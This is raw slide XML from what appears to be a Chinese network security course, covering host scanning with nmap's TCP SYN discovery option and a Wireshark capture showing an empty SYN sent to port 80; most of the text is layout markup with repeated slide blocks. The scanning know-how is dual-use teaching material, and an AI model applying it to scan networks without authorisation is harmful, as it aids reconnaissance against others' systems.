            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-8 使用-PS参数进行扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP SYN协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650230" y="988378"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.利用Wireshark工具抓取nmap工具发送的数据包，如图2-2-9所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650230" y="1633538"/>
            <a:ext cx="5276850" cy="3590925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="文本框 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5650230" y="5224463"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-9 Wireshark工具抓取数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP SYN协议的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="文本框 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5654675" y="953135"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.筛选信息进行分析，可以发现nmap工具向目标主机的80端口发送了一个空的SYN 数据包，如图2-2-10所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
